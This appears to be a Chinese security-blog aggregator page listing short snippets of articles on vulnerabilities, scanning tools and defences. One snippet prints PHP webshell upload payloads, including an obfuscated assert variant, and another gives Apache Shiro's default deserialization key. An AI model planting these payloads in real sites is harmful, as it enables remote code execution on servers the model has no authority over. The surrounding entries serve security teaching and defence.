JRE漏洞

Dest1ny漏洞库:用友 U8-CRM 系统 ajaxgetborrowdata.php 存在 SQL 注入漏洞

大家好,今天是Dest1ny漏洞库的专题!!会时不时发送新的漏洞资讯!!大家多多关注,多多点赞!!!
Dest1ny(信息安全业务随时dd)·2025-02-19 00:54

深入了解 AppScan 工具的使用:筑牢 Web 应用安全防线

前言IBMAppScan作为一款业界领先的Web应用程序安全测试工具,就像一位专业的“安全卫士”,能够精准高效地识别并协助修复各类安全漏洞,为应用安全保驾护航。
垚垚 Securify 前沿站·2025-02-18 22:01

新的 OpenWrt RCE 漏洞曝光,影响数百万台网络设备

自2016年下半年的Mirai僵尸网络攻击事件之后,物联网相关的威胁层出不穷,多个在野漏洞被攻击者所利用,多个僵尸网络相继被研究人员发现。
m0_74079109·2025-02-18 18:43

CVE-2024-34527 D-Link DSL-3782命令注入漏洞复现_dsl-3782_a1_eu_1(1)

一、漏洞描述CVE-2022-34527D-LinkDSL-3782v1.03及以下版本被发现包含通过函数byte_4C0160的命令注入漏洞,根据已知公开在cfg_manger文件的代码sub_474c78
2401_84009698·2025-02-18 18:39

TCP协议:深入理解如何收集主机信息

TCP协议:深入理解如何收集主机信息在网络安全领域,信息收集是渗透测试和漏洞评估的首要步骤。TCP协议,作为互联网上应用最广泛的传输层协议之一,为我们提供了丰富的信息收集手段。
小宇python·2025-02-18 17:35

ASan & HWASN 内存漏洞修复实践(一)简介

目录ASAN简介基本概念工作原理优势应用场景HWASanHWASan**与ASan的对比**本文首先简单介绍asan和hwasan的基本概念和区别,后续文章将详细介绍如何在arm平台或x86平台,利用asan/hwasan工具对大型协议软件进行内存问题分析。ASAN简介基本概念ASAN(AddressSanitizer)是一个由Google开发的、用于C和C++程序的快速内存错误检测工具,它能够在
月光技术杂谈·2025-02-18 16:26

2024山东省职业院校技能大赛“网络空间安全”赛题及赛题解析(超详细)_2024年山东省职业院校技能大赛中职组网络安全赛项竞赛样题(2)

(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、GoogleHacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF
2401_84252820·2025-02-18 13:52

过于依赖chatgpt编程会有哪些弊端?

2.代码质量看运气ChatGPT生成的代码看似能用,但可能有隐藏的bug(比如安全漏洞、性能差),或者和你的实际需求不符。如果完全不检查直接运行,相当于闭着眼睛开车,翻车概率大增
奇偶变不变·2025-02-18 13:22

ASP.NET MVC或者.net Core mvc 页面使用富文本控件的 保存问题

https://blog.csdn.net/leftfist/article/details/69629394目前在做的项目存在XSS安全漏洞
weixin_30949361·2025-02-18 12:14

validation 实现参数校验

参数校验可以防止无效的输入导致的异常或错误,同时也能减少因为无效参数导致的安全漏洞Java中的参数校验可以通过手动编写校验逻辑来实现,但这样会增加代码的复杂度和重复性。
程序员老王wd·2025-02-18 07:24

文件上传漏洞常用payload

[极客大挑战2019]UploadGIF89a@eval($_POST[1]);GIF89a$a="a"."s";$b="s"."e"."r"."t";$c=$a.$b;$c($_POST["1"]);
Werqy3·2025-02-18 04:50

网络安全-攻击流程-应用层

应用层攻击针对OSI模型的第七层(应用层),主要利用协议漏洞、业务逻辑缺陷或用户交互弱点,直接威胁Web应用、API、数据库等服务。
星河776(重名区分)·2025-02-18 03:35

选择开发代码审计工具的编程语言需要结合具体场景和技术需求,不同语言在性能、生态、开发效率等方面各有优劣

文本处理:正则表达式和字符串操作能力极强,适合模式匹配(如漏洞规则扫描)。丰富生态:有Bandit、Semgrep(部分组件)等成熟工具的底层支持,可直接调用现成的安全分析库。跨语言支持:通过抽
rockmelodies·2025-02-18 01:13

网络安全组织架构表 网络安全技术架构

XSS攻击,SQL注入,防盗链,csrf模拟请求,文件上传漏洞,忘记密码漏洞,Api接口幂等,其他问题等等,,,,,,一,什么是XSS?Xss就是javascript脚本攻击,就是在表
网络安全King·2025-02-17 20:54

供应链协作中的文件安全风险,企业如何防范数据泄露?

典型案例:2025年2月,一家全球知名汽车制造商在与外包厂商共享电池供应链数据时,因安全协议漏洞,导致核心设计方案外泄,竞争对手迅速推出相似产品,直接造成3亿美元的损失。在供应链协作过程中,企业机
够快云库·2025-02-17 18:32

什么是域名劫持?如何防止域名劫持?

域名劫持的常见方式包括窃取域名注册商账户信息、利用社会工程学攻击、或通过DNS服务器漏洞实施攻击。域名劫持的危害用户隐私泄露:用户被引导至恶意网站,可能导致个人
·2025-02-17 10:04

OpenVAS 工具使用全攻略

OpenVAS3.1初始化OpenVAS3.2设置管理员密码3.3启动服务四、使用OpenVAS进行扫描4.1登录Web界面4.2创建扫描任务4.3启动扫描4.4查看扫描结果五、结果分析与处理5.1风险等级评估5.2漏洞修复建议六
垚垚 Securify 前沿站·2025-02-17 08:06

信息安全之网络安全

网络安全大致包含的内容主要有防火墙,入侵检测,漏洞扫描与网络隔离,拒绝服务攻击检测与防御,计算机病毒防治以及×××技术的概念、原理、应用部署等方面。
黑客Jack·2025-02-17 06:20

工控网络安全学习路线

接着学习C/C++,掌握面向过程和面向对象编程的基本概念和技术,为后续的漏洞挖掘和底层分析打下基础。最后学习Python,它在安全领域应用广泛,可用于自动化脚本编写、漏洞扫描和数据分析等。
206333308·2025-02-17 06:50

在软件产品从开发到上线过程中,不同阶段可能出现哪些问题,导致软件最终出现线上bug

在软件产品从开发到上线的全生命周期中,不同阶段都可能因流程漏洞、技术疏忽或人为因素导致线上问题。
测试-东方不败之鸭梨·2025-02-17 06:47

网络安全入门信息收集与漏洞扫描(二)

主动信息收集1Nmap扫描端口与服务(1)Nmap是什么?定义:网络探测工具,用于扫描开放端口、识别服务及操作系统。典型用途:发现目标存活主机(ping扫描)。识别开放端口和运行的服务(如SSH、HTTP、数据库)。探测操作系统类型(Windows/Linux)。(2)基础扫描命令快速扫描常用端口:nmap-sV-T4192.168.1.100#-sV探测服务版本,-T4加速扫描示例输出:PORT
挣扎与觉醒中的技术人·2025-02-16 21:44

9 个构建安全 PHP 应用的开发技巧

有时,源自第三方API的数据格式混乱不堪,完全偏离预期;又或是用户输入一些稀奇古怪、让人摸不着头脑的字符串,令人防不胜防;还有可能隐藏着悄然引发安全漏洞的故障,在暗处伺机而动,给整个项目带来巨大风险。
程序员阿凡提·2025-02-16 19:29

Redis之父学生时代发现的ping漏洞的源码分析

不久之后,antirez发现了一个ping的漏洞,非root用
·2025-02-16 19:21

shiro 反序列化漏洞解决方案

问题版本shiro1.2.4官方默认key:kPH+bIxk5D2deZiIxcaaaA==获取相关信息解决方案:升级到更新版本:1.3.0兼容jdk1.7检测工具:shiro_attack-4.7.0-SNAPSHOT-all.zip
小明同学哦·2025-02-16 17:40

WEB漏洞-XXE&XML之利用检测绕过

XXE"xmlexternalentityinjection"-XML外部实体注入漏洞服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入xml基本语法XML被设计用来结构化
网小白白·2025-02-16 16:37

java 知识点突击-(1-10)

文章目录前言java知识点扫盲目录java知识点突击-(1-10)01JDK、JRE、JVM什么区别02==和equals的区别03hashcode()与equals()的作用、区别和联系04重载和重写的区别
栗子~~·2025-02-16 12:35

openwrt 桥模式下ebtables转发所有流量到三层,导致DHCP无法获取IP解决方案

需求需要统计桥模式下的终端设备流量解决方案使用ebtables将二层流量转到三层然后处理,使用以下指令实现ebtables-tbroute-ABROUTING-pipv4-jredirect出现问题桥模式下接入的设备无法获取到
wellnw·2025-02-16 11:54

红队视角出发的k8s敏感信息收集——持久化存储与数据泄露

通过巧妙地利用配置不当或已知漏洞,攻击者能够从中收集到包括密钥、访问凭证在内的大量敏感数据,进而导致数据泄露事件的发生。
周周的奇妙编程·2025-02-16 10:51

java springboot连接sqlserver使用

pom.xml增加sqlserver驱动com.microsoft.sqlservermssql-jdbc9.4.0.jre8application.yml配置文件server:port:9001#spring
大得369·2025-02-16 06:50

每天一篇逻辑漏洞

前言:水一篇文章,今天也没有去挖洞内容:学了那么多了,还没有长进,是不是我的学习方法有问题但是到底哪里有问题呢,我又不知道,我好像好久没有总结了,应该写一篇日记,然后总结的一篇文章,然后把日记的内容丢里面,感觉就挺好了,就不用去找文章了好了就这样,进入正题好了,今天学会伪造了jsonp的xss,就是说是json格式的话,不是jsonp格式,可以尝试在url后面加上callback,看是否有返回值
不灭锦鲤·2025-02-16 05:42

Vulhub靶机 ActiveMQ 反序列化漏洞(CVE-2015-5254)(渗透测试详解)

一、开启vulhub环境docker-composeup-d启动dockerps查看开放的端口漏洞版本:ApacheActiveMQ5.x~ApacheActiveMQ5.13.0二、访问靶机IP8161
芜丶湖·2025-02-16 02:21

网络安全---SQL注入攻击

一、实验目的SQL注入是一种代码注入技术,可利用Web应用程序和数据库服务器之间接口中的漏洞。当用户的输入在发送到后端数据库服务器之前未在Web应用程序中正确检查时,该漏洞就存在。
犹若故人归·2025-02-16 02:20

溯源-如何还原攻击路径

溯源-如何还原攻击路径1.web入侵流程2.windows-还原攻击路径3.linux-还原攻击路径1.web入侵流程信息收集->漏洞扫描->渗透攻击->提权->后渗透->持续控制2.windows-还原攻击路径日志分析
C Aires·2025-02-16 02:19

筑墙扫漏检入侵网安三叉戟出阵

20世纪90年代中期,在互联网迅速发展时期的网络对抗格局中,“攻”的力量大致可以分成两类:一类是大量低层次、低技术、破坏性的攻击者,包括“脚本小子”;另一类是一小群深入研究、发现漏洞的技术高手。
Liana-Fany·2025-02-16 01:44

网络安全-攻击流程-传输层

传输层攻击主要针对OSI模型的第四层,涉及TCP和UDP协议的安全漏洞
星河776(重名区分)·2025-02-16 01:44

XSS攻击全貌:原理、分类、检测与防御策略研究

XSS攻击原理的深入剖析跨站脚本攻击(Cross-SiteScripting,简称XSS)作为一种广泛存在的web应用程序安全漏洞,其机制在于利用了客户端与服务器之间数据交换过程中的信任链被恶意破坏。
键盘侠伍十七·2025-02-15 22:47

Memcached服务器UDP反射放大攻击

1、前言2月28日,Memcache服务器被曝出存在UDP反射放大攻击漏洞。攻击者可利用这个漏洞来发起大规模的DDoS攻击,从而影响网络正常运行。
weixin_30639719·2025-02-15 20:03

网络安全-攻击流程-网络层

攻击者通过操纵数据包、路由信息或协议漏洞实施破坏。
星河776(重名区分)·2025-02-15 16:00

python——脚本实现检测目标ip是否存在文件包含漏洞

python爬虫——request模块(一)_xiaochuhe的博客-CSDN博客_pythonrequestpython——正则表达式(一)_xiaochuhe的博客-CSDN博客举例dvwa——FileInclusion代码如下:importrequestsimportreurl=input("请输入需要检测的网址:&#
xiaochuhe--kaishui·2025-02-15 13:39

走进Java:JDK和JRE分别是什么?它们有什么区别?

目录引言一、概述二、JRE(JavaRuntimeEnvironment)三、JDK(JavaDevelopmentKit)四、安装和配置五、区别和联系六、总结引言  Java是一门非常流行的编程语言,
老鼠只爱大米·2025-02-15 12:05

#最新#2025年护网#蓝队防守必须排查的57个安全漏洞与解决方案 (上)

免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。目录一、OA系统泛微(Weaver-Ecology-OA)致远(Seeyon)通达OA(TongDaOA)二、E-mailExchangeCoremail三、Web中间件ApacheWeblo
独行soc·2025-02-15 12:03

一文读懂 Windows 逆向工程中的滑板指令

滑板指令的其他用途五、总结与作业在Windows逆向工程领域,滑板指令(NOP指令,即No-Operation的缩写)是一项极为实用的技术,对于软件安全工程师而言,熟练掌握它,就如同掌握了一把开启软件破解与漏洞利用大门的钥匙
阿贾克斯的黎明·2025-02-15 12:33

sendmessage WM_PAINT 无效(6月19日)

今天意外发现替一哥们做的程序还有漏洞,点击弹出来的对话框的BUTTON时,发现主窗口(实际是VIEW啦)不自动重绘以产生相应图形。
Randyqiu·2025-02-15 11:50

漏洞挖掘还能做副业

一、网络安全的重要性:从‘不学会被黑’到‘学会保护别人’网络安全的概念现在不再是技术圈的独立话题,它已经渗透到社会的各个领域。从个人的隐私保护、企业的数据安全,到国家的信息防护,网络安全几乎影响了每一个人的生活。无论是黑客攻击、勒索病毒、数据泄露,还是国家间的信息战,网络安全已经成为现代社会的基础设施之一。所以,首先要明白学习网络安全的重要性:你不仅是在学习技术,更多的是在为自己和他人的安全“筑城
~小羊没烦恼~·2025-02-15 11:19

c#自动更新-源码

软件维护与升级修复漏洞和缺陷:软件在使用过程中可能会发现各种漏洞和缺陷,自动更新可以及时推送修复程序,增强软件的稳定性和安全性,避免因漏洞被利用而导致数据泄露、系统崩溃等问题。
未来之窗软件服务·2025-02-15 07:22

浏览器安全学习

浏览器特性会将一些特殊符号当做字母进行解析,此时一个符号可能会被解析成两个到三个字母,这样子如果有漏洞对输入做了限制,黑客就可以利用这个特性来绕过某些漏洞中长度限制。
Shanfenglan7·2025-02-15 06:47

Web应用安全威胁与防护措施

本文已收录至《全国计算机等级考试——信息安全技术》专栏由于极其容易出现漏洞、并引发安全事故,因此数据隐私的保护是目前绝大多数企业不可绕过的运维环节。
星环之光·2025-02-15 03:43

Python基于Django的漏洞扫描系统【附源码、文档说明】

博主介绍:✌Java老徐、7年大厂程序员经历。全网粉丝12w+、csdn博客专家、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java技术领域和毕业项目实战✌文末获取源码联系精彩专栏推荐订阅不然下次找不到哟2024-2025年Java毕业设计选题推荐Python基于Django的微博热搜、微博舆论可视化系统(V3.0)基于PythonDjango的北极星招聘数据可视化系统感兴趣的可以先收
Java老徐·2025-02-15 02:12

《网络安全自学教程》- 子域名收集

泛域名解析1.2、泛域名解析与CND的冲突二、搜索引擎语法收集子域名1、百度2、必应三、第三方网站1、VirusTotal2、DNSdumpster3、站长之家四、证书透明性发现子域名五、DNS域传送漏洞发现子域名子域名就是下一级域名的意思
士别三日wyx·2025-02-15 02:39

【网络安全 | 漏洞挖掘】跨子域账户合并导致的账户劫持与删除

文章目录概述正文漏洞成因概述在对目标系统进行安全测试时,发现其运行着两个独立的域名——一个用于司机用户,一个用于开发者/企业用户。
秋说·2025-02-15 00:55
上一页 1 2 3 4 5 6 7 8 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他